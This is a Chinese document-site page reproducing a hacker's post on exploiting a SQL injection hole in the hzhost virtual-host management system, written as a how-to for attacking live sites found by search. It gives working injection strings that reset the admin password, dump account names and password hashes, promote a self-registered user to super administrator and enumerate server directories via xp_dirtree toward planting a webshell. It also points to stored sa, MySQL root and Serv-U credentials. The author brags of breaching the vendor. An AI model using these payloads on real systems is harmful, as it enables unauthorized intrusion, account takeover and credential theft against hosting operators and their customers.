- 1、本文档共7页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
hzhost域名虚拟主机管理系统sql注射漏洞进一步利用
这是一个域名主机实时管理系统。在百度有哪些信誉好的足球投注网站: title: (域名主机实时管理系统) ,会找到大量采用这种系统的网站!太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web程序。和IIS管理程序。实现在线开通的玩 意。所以:我们可以免费申请域名和空间!!哈哈!!!
web程序方面写的非常严谨。大量的过滤。由于是商业版的程序,所以我没有源码。本来是有的,但是放在家里的电脑上。放暑假时搞的shell现在都被删了。。。我现在又比较懒,就没去弄源代码。反正大家知道怎么弄的就行了。
这又是一个文本框的注射。我真不知道作者是怎么想的。其他地方都被过滤了。就留下域名管理这里没过滤。
官方放暑假的时候就被我搞了一遍,过了一个月他发现了。删了我的shell。不知道他怎么知道我从那里下的手搞的他。他居然补了漏洞。先上图,再说下利用方法。
123 UPDATE [memlst] SET u_pss=e10adc3949ba59abbe56e057f20f
这一句是把用户admin的密码修改为123456。管理员的后台地址一般是/master或者直接在首页登陆了按切换到管理员后台。如果admin不是超级管理员,那就有三个办法。
一是自己构造语句爆出来。二是提升自己注册的用户的权限。三是直接爆网站路径,再来个差异备份。
第一个方法我给出一条示范语句:
123 and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )0-- and 1=1
可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。
第二个方法是:
123 UPDATE [memlst] SET u_sys=6 WHERE u_nme=你注册的用户名--
123 UPDATE [memlst] SET u_pwr=2 WHERE u_nme=你注册的用户名--
这2句话就能够提升自己为超级管理员
第三个方法很麻烦。但是很有效果。直捣黄龙。。很强大。我给出如下语句,大家自己研究去吧!
爆路径语句
第一步:建立表123 ;drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and 1=1
第二步:123 ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert foofoofoo execute master..xp_dirtree @z,1,1-- and
注意:0x63003a005c
其他的自己找工具去转吧!
第三步:暴出总数 123 and (select cast(count(*) as varchar(8000))+char(94) from foofoofoo)0-- and 1=1
第四步:暴出你想要的文件夹名字和文件名字 123 and 0(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top? 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)-- and 1=1
修改中间红色的1,依次爆出。
至于差异备份语句。让nbsi3告诉你吧。
对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用!
我记得还有2篇关于hzhost的漏洞利用文章。名字不记得了。大家去有哪些信誉好的足球投注网站“hzhost漏洞”找找吧!里面提到下面两点内容!
1。是提到c:\windows\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码2。是利用hzhost拿系统主机最高权限的。
安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在
HKEY_LOCAL_MACHIN
您可能关注的文档
最近下载
- BRIDON起重机钢丝绳样本-中文版.pdf VIP
- 初中音乐教学中的合唱教学现状研究-音乐论文-艺术论文.docx
- 2024年合规翼展 御浪远航-企业出海数据合规指导书【下(共两册)】.pdf VIP
- 2025年兰州现代职业学院单招语文考试模拟试题及答案解析.docx
- 国家公祭日(勿忘国耻振兴中华)课件.pptx
- 工程项目施工人员安全指导手册.ppt VIP
- 碳元科技:首次公开发行股票招股说明书.docx
- 脑电仿生电刺激仪治疗老年慢性失眠的疗效观察.pdf VIP
- 2024年上海中考物理专题复习精练 专题08 动态电路分析含详解.doc VIP
- 北京航天益来电子科技有限公司拟股权转让涉及的股东全部权益价值评估说明.pdf
文档评论(0)